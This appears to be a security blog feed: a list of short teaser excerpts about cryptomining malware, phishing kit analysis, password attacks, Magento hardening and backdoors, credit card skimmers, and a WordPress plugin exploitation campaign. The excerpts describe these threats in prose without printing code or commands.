What is Cryptocurrency Mining Malware?


Cryptocurrency mining malware is typically a stealthy malware that farms the resources on a system (computers, smartphones, and other electronic devices connected to the internet) to generate revenue for the cyber criminals controlling it.  Instead of using video game consoles or graphics card farms, these particular cryptominers are using the computers and servers of the people around them for their processing power – without permission. This type of malware mines cryptocurrencies on the systems of their targets or even steals cryptocurrency from other targets, using its resources in such a way that the owner wouldn’t know. Continue reading What is […]

Analysis of a Phishing Kit (that targets Chase Bank)


Most of us are already familiar with phishing: A common type of internet scam where unsuspecting victims are conned into entering their real login credentials on fake pages controlled by attackers. Once entered, the attackers syphon off those login details and use them for their own purposes. Sometimes this can just be a nuisance: for example  someone entering their Netflix account login information into a bogus page. Things become much more serious when banking information is involved. Continue reading Analysis of a Phishing Kit (that targets Chase Bank) at Sucuri Blog.

How Passwords Get Hacked


Can you think of an online service that doesn’t require a password? Everything on the internet requires a password. However, constantly creating and remembering new and ever more complex passwords is no small task. In fact, 66% of people polled admitted to using the same password more than once because of how hard it is to remember passwords that are considered strong. Taking steps to make passwords easier to remember can also make them easier for hackers to guess. Continue reading How Passwords Get Hacked at Sucuri Blog.

7 Ways to Secure Magento 1


While unpatched installations of Magento 2 contain many vulnerabilities, I’m going to focus my attention on Magento 1 for this article. This is because Magento 2 provides regularly updated patches for many of the most common vulnerabilities targeting the platform. While Magento 1 also contains patches for many known vulnerabilities, those patches are not currently maintained. Magento 1 reached its end-of-support on June 30, 2020. When Magento 2 was released, the focus was to improve security, include speed improvements, support the latest PHP installations, include SEO optimizations and provide a more user-friendly interface. Continue reading 7 Ways to Secure Magento […]

Adobe Patches Critical Magento Vulnerabilities in Recent Update


Adobe has recently released several critical security patches for both their open source and commercial versions of their ecommerce platform. There are a total of 18 security vulnerabilities patched according to Adobe, although they list only 16 specific issues in the patch notes. Eleven of these issues are considered critical and five considered important, ranked by CWE standards. Ten of these vulnerabilities do not require any authentication whatsoever in order to be exploited, whereas the remaining six do require an admin account. Continue reading Adobe Patches Critical Magento Vulnerabilities in Recent Update at Sucuri Blog.

Best Practices for Web Form Security


Web form security  ⁠— the set of tools and practices intended to protect web forms from attacks and abuse ⁠— is one of the most critical aspects of overall website security. Web forms allow users to interact with your site and enable a lot of useful functionality. However, once a user can interact with your site to do something useful there is a new attack surface for a hacker to exploit.   To help you get the usability benefits of web forms while limiting the security risks we’ve created this list of best practices for web form security. Continue reading […]

Examining Unique Magento Backdoors


During a recent investigation into a compromised Magento ecommerce environment, we discovered the presence of five different backdoors that would provide attackers with code execution capabilities. The techniques used by the attackers in these backdoors illustrates the ever-changing landscape of website security and highlights some of the tactics used to avoid traditional backdoor detection. Reflection Functions One such backdoor was appended to the Magento core file /errors/503.php: This sample takes user input from the “ID” URL parameter and builds a reflection function, where the object stored in the $func variable will now reflect whichever function the attacker passed as input. […]

Stylish Magento Card Stealer loads Without Script Tags


Recently one of our analysts, Weston H., found a very interesting credit card stealer in a Magento environment which loads a malicious JavaScript without using any script tags. In this post I will go over how it was found, how to decode it and how it works! One of our clients was reporting that one of their website visitors was receiving a warning from their antivirus program when navigating to their checkout page: Calls were being made to a known malicious domain that was already blacklisted by multiple vendors for distributing malware and involvement in carding attacks: This certainly indicated […]

Vulnerable Plugin Exploited in Spam Redirect Campaign


Some weeks ago a critical unauthenticated privilege escalation vulnerability was discovered in old, unpatched versions of the wp-user-avatar plugin. It also allows for arbitrary file uploads, which is where we have been seeing the infections start. This plugin has over 400,000 installations so we have seen a sustained campaign to infect sites with this plugin installed. In this post I will review a common infection seen as a result of this vulnerability in the wp-user-avatar plugin. Continue reading Vulnerable Plugin Exploited in Spam Redirect Campaign at Sucuri Blog.

Magecart Swiper Uses Unorthodox Concatenation


MageCart is the name given to the roughly one dozen groups of cyber criminals targeting e-commerce websites with the goal of stealing credit card numbers and selling them on the black market. They remain an ever-growing threat to website owners. We’ve said many times on this blog that the attackers are constantly using new techniques to evade detection. In this post I will go over a case involving one such MageCart group. A Hacked Magento Website Some time ago a client of ours came to us with a heavily infected Magento e-commerce website from where credit card details were being […]